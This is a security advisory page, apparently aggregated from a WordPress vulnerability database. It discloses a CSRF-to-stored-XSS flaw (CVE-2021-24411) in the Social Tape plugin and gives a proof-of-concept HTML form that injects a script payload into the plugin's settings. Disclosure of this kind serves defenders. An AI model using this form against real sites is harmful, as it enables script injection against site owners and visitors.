Lucene search
AshishWPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24HistoryJul 19, 2021 - 12:00 a.m.
Social Tape <= 1.0 - CSRF to Stored XSS
2021-07-1900:00:00
Ashish
363
The plugin does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=social-tape/social_tape.php" method="POST">
<input type="hidden" name="oscimp_hidden" value="Y" />
<input type="hidden" name="tape_fb" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="tape_tb" value="" />
<input type="hidden" name="tape_gp" value="" />
<input type="hidden" name="tape_da" value="" />
<input type="hidden" name="tape_tw" value="" />
<input type="hidden" name="tape_yt" value="" />
<input type="hidden" name="tape_ytlink" value="" />
<input type="hidden" name="Submit" value="Update Options" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
cve
cve
CVE-2021-24411
2021-08-16 11:15:00
prion
prion
Cross site scripting
2021-08-16 11:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Social Tape <= 1.0 - CSRF to Stored XSS
2021-07-19 00:00:00
Related for WPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24